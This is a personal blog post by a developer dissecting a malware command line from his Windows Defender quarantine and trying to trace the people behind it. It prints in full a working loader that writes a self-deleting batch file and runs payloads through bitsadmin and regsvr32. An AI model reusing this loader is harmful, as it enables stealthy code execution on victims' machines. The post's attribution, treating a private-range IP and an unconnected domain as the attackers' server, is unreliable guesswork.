I fell down a malware rabbit hole 👾

Geoffrey Mahugu
Dec 4, 2018 · 5 min read

For most people when they see ‘Threat found notification, they simply let their trusted antivirus to take care of it. Well, being a curious programmer, I decided to have a look at the quarantined virus.

This the journey as i decipher a malware that i found on my PC and get to the real identity of my Hackers. So come along for the ride.

Where it all started.

What happens when you want a piece of software/music but have no cash to spare?

You get it on thepiratebay3.org 👍

No, just kidding, you should never download any software/music from piratebay or any other torrent sites 😀

For this is what will happen to you

I started getting persistent notifications of ‘Threat found’. Immediately I stopped the installation and did a quick scan. After that, I updated windows defender and made a full scan.

3 days later and i’m still getting ‘Threat found’ notification.

That was odd as I always did daily updates and after that, I would do a quick scan. So I did what any other regular Joe would do and had another quick scan, then did a full scan and finally had an offline scan but still got the same notification, ‘Windows defender has found a new threat’.

What next?

Being a curious programmer, I decided to have a look at the malware’s source code in the windows defender quarantine section.

Hmm... That’s interesting 🤔, how comes windows have not yet been able to solve this issue and the source code is right there in front of my eyes.

CmdLine: \Device\HarddiskVolume4\Windows\System32\cmd.exe “cmd.exe” /c start /min cmd /c “(echo @echo off > “C:\ProgramData\a1e62b52–3bf5–0\x.bat” & echo bitsadmin /complete a1e62b52–3bf5–0 ^> nul >> “C:\ProgramData\a1e62b52–3bf5–0\x.bat” & echo bitsadmin /cancel a1e62b52–3bf5–0 ^> nul >> “C:\ProgramData\a1e62b52–3bf5–0\x.bat” & echo if exist “C:\ProgramData\a1e62b52–3bf5–0\a1e62b52–3bf5–0.d” goto q >> “C:\ProgramData\a1e62b52–3bf5–0\x.bat” & for /f %i in (‘dir /a:-d /b /w “C:\ProgramData\a1e62b52–3bf5–0\*.tmp”’) do (echo start /b /min regsvr32.exe /s /n /i:”!=47468f40a1e62b53 “ “C:\ProgramData\a1e62b52–3bf5–0\%i” >> “C:\ProgramData\a1e62b52–3bf5–0\x.bat”)) > nul & echo :q >> “C:\ProgramData\a1e62b52–3bf5–0\x.bat” & echo start /b /min regsvr32.exe /s /n /i:”!=47468f40a1e62b53 “ “C:\ProgramData\a1e62b52–3bf5–0\a1e62b52–3bf5–0.d” >> “C:\ProgramData\a1e62b52–3bf5–0\x.bat” & echo del “C:\ProgramData\a1e62b52–3bf5–0\x.bat” ^& exit >> “C:\ProgramData\a1e62b52–3bf5–0\x.bat” & “C:\ProgramData\a1e62b52–3bf5–0\x.bat””

First Clue

\cmd.exe “cmd.exe” /c start /min cmd /

This code would result in the script starting a small command prompt to run a script then close on completion.

This happens so fast that you would hardly notice it.

Second Clue: (Bitsadmin)

Is this some sort of admin or is the script accessing my admin privileges and spying on me? Sending my data to some remote server in Russia? Or is my data being sold to some Indian scammers in Mumbai?

Let's keep going…

Third Clue

& echo if exist “C:\ProgramData\a1e62b52–3bf5–0\a1e62b52–3bf5–0.d”

Hmm.. seems like the script is looking for the existence of a file in this directory

C:\ProgramData\a1e62b52–3bf5–0\a1e62b52–3bf5–0.d

The next piece of code is:

goto q >> “C:\ProgramData\a1e62b52–3bf5–0\x.bat”

This implies: on the existence of the file, proceed to the directory below.

“C:\ProgramData\a1e62b52–3bf5–0\x.bat”

Fourth Clue

& for /f %i in (‘dir /a:-d /b /w “C:\ProgramData\a1e62b52–3bf5–0\*.tmp

The script looks into the directory below:

C:\ProgramData\a1e62b52–3bf5–0\

Then loops over all the files looking for any file with the extension *tmp

Then runs this code:

do (echo start /b /min regsvr32.exe

This is where it starts a small command prompt and runs this program: regsvr32.exe

regsvr32.exe is a windows program that’s used to register and unregister OLE controls, such as DLLs and ActiveX controls in the Windows Registry.

So let's go to the file location.

Guess what we find? BIT3D39.tmp

Let's keep going…

Fifth Clue (Opening the Trojan file)

Let's have a look at how glorified hackers write malware code 😎.

In HTML!!!

Let's break it down, should be fun 😉

Sixth Clue (metadata)

<meta http-equiv=pragma content=nocache>

<META HTTP-EQUIV=Expires CONTENT=-1>

This code snippet means that the hackers don’t want to cache any data on your computer’s memory. The reason may be because they need to run the latest script every time the malware updates.

Seventh Clue ( auto-submit function)

autosubmit()

This JavaScript code is placed at the header and runs every time the document is ready 😬.

Eighth Clue

http://172.16.16.16/24online/webpages/client.jsp

When the script runs, it submits the form to this API endpoint by making a POST request. By looking at the endpoint you can know that the hacker’s back-end is written in Java programming language (.jsp). This would actually mean that the script is either:

i. Uploading my data to the hacker’s remote server or

ii. My computer is in constant connection to the hacker’s server.

Curious to know where the data ends up?

I place the URL on my browser and this is what I get.

The server is down! That’s good news. They must have been taken down. But that’s not quite.

I decide to go even deeper into the rabbit hole in order to get the server’s info.

Server Info ( http://domenjob.com)

I head over to IP checker to get the full server details and this is what i find:

IP Address: 81.171.14.67

Geolocation: NL (Netherlands)

So the server is located in the Netherlands and now we have the public IP. That’s close enough to find their identity.

So they have not been shut down but have temporarily shut it down since their registry expires in 2019.

Registrar Abuse Contact Email: abuse@dynadot.com

Registrar Abuse Contact Phone: +16502620100

Now we have the contacts to report the Hackers.

To be continued…

Geoffrey Mahugu

Written by

Software Developer| Opensource contributor | Block-chain & Artificial Intelligence enthusiast | Love Angular

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade